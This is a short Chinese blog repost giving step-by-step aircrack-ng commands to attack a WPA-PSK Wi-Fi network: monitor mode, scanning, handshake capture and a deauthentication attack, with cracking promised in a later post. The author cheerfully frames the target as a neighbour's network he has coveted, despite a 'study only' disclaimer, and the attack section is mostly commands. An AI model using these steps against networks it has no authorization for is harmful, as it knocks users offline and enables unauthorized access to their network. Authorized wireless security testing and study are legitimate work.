博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
无线渗透笔记(一)-《攻击WPA-PSK加密无线网络》
阅读量:6181 次
发布时间:2019-06-21

本文共 592 字,大约阅读时间需要 1 分钟。

这篇文章问什么技术含量,因为东哥记性不好,目的是为了记录一下命令,大家凑合看看不要当真。本教程只作为学习研究之用,不能用于非法用途!!!

 

首先开启无线网卡混杂模式,wlan1是东哥支持蹭网的便携神器,之前文章有介绍。

1
airmon-ng start wlan1

 

然后看看周围存在的热点,觊觎邻居家的无线网络很久了:)

 

1
airodump-ng mon1

 

然后开始监听目标网络,通过--ivs过滤无用数据包,--bssid过滤其他AP,获取成功后右上角会有显示。

 

1
airodump-ng --ivs -bssid AP的MAC地址 -w 握手包文件名 mon1

 

然后对目标AP发起死亡攻击,邻居家貌似就一个手机在连接,好久才搞到握手包。如果AP正在下载电影,很快就能获取到握手包。--ignore-negative-one 如果AP工作频道不确定加上,客户端MAC地址在之前通过airodump-ng获取。

 

1
aireplay-ng --ignore-negative-one -0 10 -a AP的MAC地址 -c 客户端的MAC地址 mon1

 

最后我们可以看到获取到的握手包。

 

如何进行字典破解,下回再讲。

本文转自文东会博客51CTO博客,原文链接http://blog.51cto.com/hackerwang/1404748如需转载请自行联系原作者

谢文东666

你可能感兴趣的文章
从非GP到GP
查看>>
HTTP以及HTTPS协议
查看>>
报表下载SSH
查看>>
浅谈grep命令查找匹配内容的使用、参数、正则
查看>>
我的友情链接
查看>>
PHP FPM源代码反刍品味之五:信号signal处理
查看>>
Set添加自定义方法对象如何保证唯一性
查看>>
Java基础学习总结(5)——多态
查看>>
shell: demo
查看>>
使用vc+如何添加特殊字符的控件(创世纪篇)
查看>>
Linux下的常用信号
查看>>
3.UIImageView+category
查看>>
2.UIView+category
查看>>
Android ImageLoader使用
查看>>
LDTP
查看>>
StringUtils工具类的常用方法
查看>>
linux下VNC安装与配置
查看>>
URL编码
查看>>
光模块及光纤知识(含分类,常用类型介绍)
查看>>
Apache 单IP多端口设置
查看>>